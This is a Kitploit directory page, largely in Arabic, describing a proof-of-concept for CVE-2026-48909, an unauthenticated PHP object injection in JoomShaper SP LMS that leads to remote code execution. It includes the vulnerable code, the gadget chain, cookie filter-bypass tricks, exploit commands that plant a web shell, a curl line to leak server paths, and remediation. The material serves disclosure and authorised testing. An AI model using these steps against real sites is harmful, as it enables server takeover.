Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48909 — استغلال إثبات المفهوم لثغرة CVE-2026-48909: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر حقن كائنات PHP في JoomShaper SP LMS. يتضمن إرشادات للكشف والاستغلال والمعالجة. | Kitploit
أدوات/GitHubGitHub/is4yev/cve-2026-48909
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubis4yev/cve-2026-48909

CVE-2026-48909

استغلال إثبات المفهوم لثغرة CVE-2026-48909: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر حقن كائنات PHP في JoomShaper SP LMS. يتضمن إرشادات للكشف والاستغلال والمعالجة.

عرض المستودع
232منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-48909 — حقن كائنات PHP في SP LMS → RCE

CVE CVSS CWE Affected Fixed

تنفيذ أوامر عن بُعد بدون مصادقة عبر حقن كائنات PHP في JoomShaper SP LMS (com_splms) ≤ 4.1.3 لنظام Joomla CMS.

المؤلف: Amin İsayev / Proxima Cyber Security


نظرة عامة

SP LMS هو إضافة نظام إدارة التعلم الشهيرة لنظام Joomla من JoomShaper، مع أكثر من 100,000 عملية تثبيت. تقوم الإصدارات ≤ 4.1.3 بتمرير ملف تعريف الارتباط lmsOrders مباشرة إلى unserialize() بدون أي تحقق، مما يسمح لمهاجم غير مصادق بحقن كائن PHP خبيث وتحقيق تنفيذ الأوامر عن بُعد عبر سلسلة الأدوات الأصلية في Joomla.


الثغرة

السبب الجذري

components/com_splms/models/cart.php السطر 28:

root@kitploit:~
$cookie  = Factory::getApplication()->input->cookie;
$raw     = $cookie->get('lmsOrders', base64_encode(serialize(array())));
$decoded = base64_decode($raw);
$cartItems = unserialize($decoded);   // ← untrusted user input

يتم فك ترميز ملف تعريف الارتباط lmsOrders من base64 وتمريره مباشرة إلى unserialize(). يتحكم المهاجم في الكائن الناتج عن إلغاء التسلسل بالكامل.

سلسلة الأدوات

root@kitploit:~
lmsOrders cookie (attacker-controlled)
  └─► unserialize()                             [cart.php:28]
        └─► FormattedtextLogger.__destruct()    [Joomla gadget]
              └─► initFile() → File::write($path, $format)
                    └─► PHP code written to disk → RCE

ملاحظة: يتطلب تنفيذ الأوامر عن بُعد (RCE) إصدار Joomla < 5.2.2.
قام إصدار Joomla 5.2.2 بإصلاح FormattedtextLogger.__wakeup() (انظر PR #44428).
لا تزال ثغرة حقن كائنات PHP موجودة في com_splms ≤ 4.1.3 على جميع إصدارات Joomla.

تجاوز الفلتر

يطبّق Input\Cookie::get() في Joomla فلتر cmd افتراضيًا، مما يزيل + و / و = من قيمة ملف تعريف الارتباط — وهي أحرف موجودة في base64 القياسي. يستخدم الاستغلال ما يلي:

  • ترميز hex2bin() لتجنب أحرف PHP المحظورة ($, _, {, }, \n)
  • محاذاة الحشو لضمان أن يكون طول base64 قابلاً للقسمة على 3 (بدون حشو =)
  • تكرار أحرف الحشو (62 متغيرًا) لإزالة / و + من مخرجات base64

إثبات المفهوم

الاكتشاف

root@kitploit:~
python3 CVE-2026-48909.py https://target.com
root@kitploit:~
[*] Target : https://target.com
[*] Path   : /index.php?option=com_splms&view=cart
[*] Probe  : lmsOrders=Tzo4OiJzdGRDbGFzcyI6MDp7fQ==

[VULNERABLE] HTTP 500 on probe vs 200 on benign — unserialize() called on cookie
[!] Update to SP LMS >= 4.1.4 immediately.

الاستغلال

root@kitploit:~
python3 CVE-2026-48909_exploit.py https://target.com /var/www/html/tmp/x.php

PoC Screenshot

Shell نشطة على https://target.com/tmp/x.php?c=id

العثور على مسار الخادم (إذا كان غير معروف):

root@kitploit:~
# cPanel hosting — path leaks from Joomla error pages
curl -sk "https://target.com/administrator/" | grep -oP '\/home\d*\/[^"<\s]+'

# Common paths to try:
#   /var/www/html/tmp/x.php
#   /home/USER/public_html/tmp/x.php
#   /var/www/vhosts/DOMAIN/httpdocs/tmp/x.php

المتطلبات

root@kitploit:~
pip install requests

Python 3.10+


الإصلاح / المعالجة

  1. حدّث SP LMS إلى الإصدار ≥ 4.1.4 فورًا
  2. حدّث Joomla إلى ≥ 5.2.2 لإزالة سلسلة الأدوات
  3. كإجراء مؤقت — تحقق من ملف تعريف الارتباط lmsOrders وعقّمه قبل إلغاء التسلسل:
root@kitploit:~
// Do NOT use unserialize() on user-controlled data
// Use json_encode/json_decode instead
$cartItems = json_decode(base64_decode($raw), true) ?? [];

المراجع

  • CVE-2026-48909 — cve.org
  • CVE-2026-48909 — NVD
  • GHSA-gf8c-xmwj-whrh — GitHub Advisory
  • Joomla PR #44428 — FormattedtextLogger gadget patch
  • CWE-502: Deserialization of Untrusted Data
  • OWASP: PHP Object Injection

إخلاء المسؤولية

تم إصدار هذه الأداة لأغراض تعليمية و اختبارات أمنية مصرح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
لا تستخدمها ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا صريحًا لاختبارها.


Amin İsayev / Proxima Cyber Security — 2026

تنزيل الأداة
الحقلالتفاصيل
معرف CVECVE-2026-48909
GHSAGHSA-gf8c-xmwj-whrh
الإصدارات المتأثرةSP LMS (com_splms) 1.0.0 – 4.1.3
الإصلاح فيSP LMS ≥ 4.1.4
متطلب Joomla< 5.2.2 (تم إصلاح سلسلة الأدوات في 5.2.2)
CVSS 4.09.5 حرجة — AV:N/AC:L/AT:P/PR:N/UI:N
CWECWE-502: إلغاء تسلسل البيانات غير الموثوقة
مصادقة مطلوبةلا شيء
تاريخ الإفصاح2026-05-26
تاريخ النشر2026-06-20